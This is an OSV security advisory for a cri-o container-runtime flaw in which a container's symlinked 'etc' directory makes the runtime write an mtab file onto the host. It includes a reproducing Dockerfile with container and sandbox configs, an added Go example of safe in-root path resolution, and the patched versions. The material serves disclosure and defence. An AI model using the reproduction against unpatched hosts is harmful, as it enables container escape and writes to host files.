OSV:GHSA-J9HF-98C3-WRM8 (osv, Google)
History: Jun 04, 2024 - 6:12 p.m.

Malicious container creates symlink "mtab" on the host

2024-06-04 18:12:31
Google
osv.dev

CVSS3: 8.1
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: HIGH
User Interaction: REQUIRED
Scope: CHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: NONE
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N

AI Score: 6.7
Confidence: High

EPSS: 0
Percentile: 16.6%

Impact

A malicious container can affect the host by taking advantage of code that cri-o added to show the container's mounts on the host.

A workload built from this Dockerfile:

FROM docker.io/library/busybox as source
RUN mkdir /extra && cd /extra && ln -s ../../../../../../../../root etc

FROM scratch

COPY --from=source /bin /bin
COPY --from=source /lib /lib
COPY --from=source /extra .

and this container config:

{
  "metadata": {
      "name": "busybox"
  },
  "image":{
      "image": "localhost/test"
  },
  "command": [
      "/bin/true"
  ],
  "linux": {
  }
}


and this sandbox config:

{
  "metadata": {
    "name": "test-sandbox",
    "namespace": "default",
    "attempt": 1,
    "uid": "edishd83djaideaduwk28bcsb"
  },
  "linux": {
    "security_context": {
      "namespace_options": {
        "network": 2
      }
    }
  }
}

will create a file on the host at /host/mtab.
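
One way a runtime can resolve a path such as etc/mtab inside a container root filesystem so that an image-supplied symlink like the `etc` link in the Dockerfile above cannot lead outside it. This is an added example, not cri-o's code or its patch; it assumes the runtime writes etc/mtab under the container root, and the name resolveInRoot is hypothetical.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// resolveInRoot resolves rel inside root the way a chroot would: symlinks are
// followed, but absolute targets and ".." can never climb above root.
func resolveInRoot(root, rel string) (string, error) {
	cur := "/" // resolved so far, relative to root
	todo := strings.Split(rel, "/")
	for hops := 0; len(todo) > 0; {
		part := todo[0]
		todo = todo[1:]
		if part == "" || part == "." {
			continue
		} else if part == ".." {
			cur = filepath.Dir(cur) // Dir("/") is "/": clamped at root
			continue
		}
		next := filepath.Join(cur, part)
		fi, err := os.Lstat(filepath.Join(root, next))
		if err != nil || fi.Mode()&os.ModeSymlink == 0 {
			cur = next // missing or not a symlink: take it literally
			continue
		}
		target, err := os.Readlink(filepath.Join(root, next))
		if hops++; err != nil || hops > 40 {
			return "", fmt.Errorf("resolving %q: symlink loop or read error: %v", rel, err)
		}
		if filepath.IsAbs(target) {
			cur = "/" // absolute target restarts at the container root
		}
		todo = append(strings.Split(target, "/"), todo...)
	}
	return filepath.Join(root, cur), nil
}

// main builds a constructed rootfs whose "etc" is a symlink, as in the Dockerfile.
func main() {
	root, _ := os.MkdirTemp("", "rootfs")
	defer os.RemoveAll(root)
	os.Symlink("../../../../../../../../root", filepath.Join(root, "etc"))
	p, err := resolveInRoot(root, "etc/mtab")
	fmt.Println(p, err)
}
```

Resolution and the later write are separate steps, so this is only sound while nothing else can modify the container root filesystem in between.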

Patches

1.30.1, 1.29.5, 1.28.7

Workarounds

Unfortunately not
